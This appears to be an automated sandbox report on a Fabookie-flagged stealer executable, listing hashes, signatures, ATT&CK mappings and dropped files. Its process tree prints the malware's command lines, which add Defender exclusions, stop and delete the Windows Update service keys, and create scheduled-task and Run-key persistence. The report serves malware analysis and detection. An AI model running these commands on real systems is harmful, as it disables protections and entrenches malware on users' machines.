Analysis

  • max time kernel
    78s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-06-2023 02:57

General

  • Target

    1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe

  • Size

    4.2MB

  • MD5

    4179238c49a009468a87403bc51a3d48

  • SHA1

    4ba7cab7aafd77a37a2352abe7216e8f30c588a5

  • SHA256

    1adda3b870c28e6ae33226565b2f31ebfed65adf7a530a883404021104714746

  • SHA512

    73328b77b3be07c082e15fbb9882e678ab757a31563ba4614a0d0ff5b362d503fac6588278b7d50f2383187d733cbc804b9700b6a26e4d345f07b65dbd73081b

  • SSDEEP

    98304:295Xve/N7hR1j+Y5+5qBONF+Slju5IhZza8GzAZ2DIv9zMA4q3pGUOW3slcPcYJJ:+5XvOLl+Y5i4OuKjW4BJZVhMA4q3pGUP

Malware Config

Signatures

  • Detect Fabookie payload 2 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3112
      • C:\Users\Admin\AppData\Local\Temp\1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe
        "C:\Users\Admin\AppData\Local\Temp\1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Users\Admin\AppData\Local\Temp\aafg31.exe
          "C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
          3⤵
          • Executes dropped EXE
          PID:1168
        • C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
          "C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4360
          • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
            "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3332
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
              5⤵
              • Creates scheduled task(s)
              PID:4132
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2028
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                6⤵
                  PID:4652
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "oneetx.exe" /P "Admin:N"
                  6⤵
                    PID:2524
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "oneetx.exe" /P "Admin:R" /E
                    6⤵
                      PID:2124
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      6⤵
                        PID:828
                      • C:\Windows\SysWOW64\cacls.exe
                        CACLS "..\207aa4515d" /P "Admin:N"
                        6⤵
                          PID:2808
                        • C:\Windows\SysWOW64\cacls.exe
                          CACLS "..\207aa4515d" /P "Admin:R" /E
                          6⤵
                            PID:2648
                    • C:\Users\Admin\AppData\Local\Temp\XandETC.exe
                      "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
                      3⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2556
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3700
                  • C:\Windows\System32\cmd.exe
                    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1392
                    • C:\Windows\System32\sc.exe
                      sc stop UsoSvc
                      3⤵
                      • Launches sc.exe
                      PID:4924
                    • C:\Windows\System32\sc.exe
                      sc stop WaaSMedicSvc
                      3⤵
                      • Launches sc.exe
                      PID:3296
                    • C:\Windows\System32\sc.exe
                      sc stop wuauserv
                      3⤵
                      • Launches sc.exe
                      PID:3036
                    • C:\Windows\System32\sc.exe
                      sc stop bits
                      3⤵
                      • Launches sc.exe
                      PID:2052
                    • C:\Windows\System32\sc.exe
                      sc stop dosvc
                      3⤵
                      • Launches sc.exe
                      PID:2120
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                      3⤵
                        PID:632
                      • C:\Windows\System32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        3⤵
                          PID:4432
                        • C:\Windows\System32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                          3⤵
                          • Modifies security service
                          PID:1540
                        • C:\Windows\System32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                          3⤵
                            PID:1368
                          • C:\Windows\System32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                            3⤵
                              PID:4908
                          • C:\Windows\System32\cmd.exe
                            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1812
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -hibernate-timeout-ac 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4960
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -hibernate-timeout-dc 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2248
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -standby-timeout-ac 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1452
                            • C:\Windows\System32\powercfg.exe
                              powercfg /x -standby-timeout-dc 0
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1120
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2392
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:4888
                            • C:\Windows\system32\schtasks.exe
                              "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
                              3⤵
                                PID:4940
                          • C:\Program Files\Notepad\Chrome\updater.exe
                            "C:\Program Files\Notepad\Chrome\updater.exe"
                            1⤵
                            • Executes dropped EXE
                            PID:4308
                          • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                            C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                            1⤵
                            • Executes dropped EXE
                            PID:3352

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Execution

                          Scheduled Task

                          1
                          T1053

                          Persistence

                          Modify Existing Service

                          2
                          T1031

                          Scheduled Task

                          1
                          T1053

                          Privilege Escalation

                          Scheduled Task

                          1
                          T1053

                          Defense Evasion

                          Modify Registry

                          1
                          T1112

                          Impair Defenses

                          1
                          T1562

                          Credential Access

                          Credentials in Files

                          1
                          T1081

                          Discovery

                          Query Registry

                          2
                          T1012

                          System Information Discovery

                          2
                          T1082

                          Collection

                          Data from Local System

                          1
                          T1005

                          Impact

                          Service Stop

                          1
                          T1489

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Program Files\Notepad\Chrome\updater.exe
                            Filesize

                            3.7MB

                            MD5

                            3006b49f3a30a80bb85074c279acc7df

                            SHA1

                            728a7a867d13ad0034c29283939d94f0df6c19df

                            SHA256

                            f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

                            SHA512

                            e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                            Filesize

                            2KB

                            MD5

                            d85ba6ff808d9e5444a4b369f5bc2730

                            SHA1

                            31aa9d96590fff6981b315e0b391b575e4c0804a

                            SHA256

                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                            SHA512

                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            944B

                            MD5

                            62623d22bd9e037191765d5083ce16a3

                            SHA1

                            4a07da6872672f715a4780513d95ed8ddeefd259

                            SHA256

                            95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                            SHA512

                            9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            67bb457516f6409a4589ea2453b55b26

                            SHA1

                            57c6fc2374dd65b5963194f3a8cd077b01aa7457

                            SHA256

                            b49fafb6a20fbdc6aba2956aa53c7ec0c9a52b384fbffff3456f53a5286de2cc

                            SHA512

                            cbd483a48a8ac6ecd3457c6fdac72e03beb8837fa02c433347c356a8b34477aa997a942a09db934e51dfd34851365bf278b592784533a77d18a2aedd6a4c74ee

                          • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                            Filesize

                            198KB

                            MD5

                            a64a886a695ed5fb9273e73241fec2f7

                            SHA1

                            363244ca05027c5beb938562df5b525a2428b405

                            SHA256

                            563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

                            SHA512

                            122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

                          • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                            Filesize

                            198KB

                            MD5

                            a64a886a695ed5fb9273e73241fec2f7

                            SHA1

                            363244ca05027c5beb938562df5b525a2428b405

                            SHA256

                            563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

                            SHA512

                            122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

                          • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                            Filesize

                            198KB

                            MD5

                            a64a886a695ed5fb9273e73241fec2f7

                            SHA1

                            363244ca05027c5beb938562df5b525a2428b405

                            SHA256

                            563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

                            SHA512

                            122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

                          • C:\Users\Admin\AppData\Local\Temp\XandETC.exe
                            Filesize

                            3.7MB

                            MD5

                            3006b49f3a30a80bb85074c279acc7df

                            SHA1

                            728a7a867d13ad0034c29283939d94f0df6c19df

                            SHA256

                            f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

                            SHA512

                            e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

                          • C:\Users\Admin\AppData\Local\Temp\XandETC.exe
                            Filesize

                            3.7MB

                            MD5

                            3006b49f3a30a80bb85074c279acc7df

                            SHA1

                            728a7a867d13ad0034c29283939d94f0df6c19df

                            SHA256

                            f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

                            SHA512

                            e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

                          • C:\Users\Admin\AppData\Local\Temp\XandETC.exe
                            Filesize

                            3.7MB

                            MD5

                            3006b49f3a30a80bb85074c279acc7df

                            SHA1

                            728a7a867d13ad0034c29283939d94f0df6c19df

                            SHA256

                            f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

                            SHA512

                            e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgro5ujm.gyu.ps1
                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\aafg31.exe
                            Filesize

                            312KB

                            MD5

                            f7fb4ae423a2915641dab591592496ef

                            SHA1

                            7f7a321867a971cc24867f23a7d3b498df60e21e

                            SHA256

                            965498ede96248de22734c6e80d4ca2680454be6d1a3b65665b2abe0d6b55ddd

                            SHA512

                            f2c943d520fe028acd8976d276e4ca0168411f17a9904907f08df818edd3afef86cd685127ad4de086fe599314205881b4e91c04462c71760303b1a98f69f719

                          • C:\Users\Admin\AppData\Local\Temp\aafg31.exe
                            Filesize

                            312KB

                            MD5

                            f7fb4ae423a2915641dab591592496ef

                            SHA1

                            7f7a321867a971cc24867f23a7d3b498df60e21e

                            SHA256

                            965498ede96248de22734c6e80d4ca2680454be6d1a3b65665b2abe0d6b55ddd

                            SHA512

                            f2c943d520fe028acd8976d276e4ca0168411f17a9904907f08df818edd3afef86cd685127ad4de086fe599314205881b4e91c04462c71760303b1a98f69f719

                          • C:\Users\Admin\AppData\Local\Temp\aafg31.exe
                            Filesize

                            312KB

                            MD5

                            f7fb4ae423a2915641dab591592496ef

                            SHA1

                            7f7a321867a971cc24867f23a7d3b498df60e21e

                            SHA256

                            965498ede96248de22734c6e80d4ca2680454be6d1a3b65665b2abe0d6b55ddd

                            SHA512

                            f2c943d520fe028acd8976d276e4ca0168411f17a9904907f08df818edd3afef86cd685127ad4de086fe599314205881b4e91c04462c71760303b1a98f69f719

                          • C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
                            Filesize

                            198KB

                            MD5

                            a64a886a695ed5fb9273e73241fec2f7

                            SHA1

                            363244ca05027c5beb938562df5b525a2428b405

                            SHA256

                            563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

                            SHA512

                            122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

                          • C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
                            Filesize

                            198KB

                            MD5

                            a64a886a695ed5fb9273e73241fec2f7

                            SHA1

                            363244ca05027c5beb938562df5b525a2428b405

                            SHA256

                            563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

                            SHA512

                            122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

                          • C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
                            Filesize

                            198KB

                            MD5

                            a64a886a695ed5fb9273e73241fec2f7

                            SHA1

                            363244ca05027c5beb938562df5b525a2428b405

                            SHA256

                            563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

                            SHA512

                            122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

                          • memory/1168-176-0x00000000032F0000-0x0000000003421000-memory.dmp
                            Filesize

                            1.2MB

                          • memory/1168-178-0x00000000032F0000-0x0000000003421000-memory.dmp
                            Filesize

                            1.2MB

                          • memory/1168-175-0x0000000003170000-0x00000000032E1000-memory.dmp
                            Filesize

                            1.4MB

                          • memory/2392-208-0x00000156A7720000-0x00000156A7730000-memory.dmp
                            Filesize

                            64KB

                          • memory/2392-210-0x00000156A7720000-0x00000156A7730000-memory.dmp
                            Filesize

                            64KB

                          • memory/2392-209-0x00000156A7720000-0x00000156A7730000-memory.dmp
                            Filesize

                            64KB

                          • memory/2556-214-0x00007FF74E080000-0x00007FF74E43D000-memory.dmp
                            Filesize

                            3.7MB

                          • memory/2556-177-0x00007FF74E080000-0x00007FF74E43D000-memory.dmp
                            Filesize

                            3.7MB

                          • memory/3700-193-0x00000257EDC80000-0x00000257EDC90000-memory.dmp
                            Filesize

                            64KB

                          • memory/3700-194-0x00000257EDC80000-0x00000257EDC90000-memory.dmp
                            Filesize

                            64KB

                          • memory/3700-192-0x00000257EDC80000-0x00000257EDC90000-memory.dmp
                            Filesize

                            64KB

                          • memory/3700-187-0x00000257D55D0000-0x00000257D55F2000-memory.dmp
                            Filesize

                            136KB

                          • memory/4308-231-0x00007FF7AFB80000-0x00007FF7AFF3D000-memory.dmp
                            Filesize

                            3.7MB

                          • memory/4888-225-0x0000018C12440000-0x0000018C12450000-memory.dmp
                            Filesize

                            64KB

                          • memory/4888-226-0x0000018C12440000-0x0000018C12450000-memory.dmp
                            Filesize

                            64KB

                          • memory/4888-227-0x0000018C12440000-0x0000018C12450000-memory.dmp
                            Filesize

                            64KB

                          • memory/5004-133-0x0000000000D20000-0x000000000115E000-memory.dmp
                            Filesize

                            4.2MB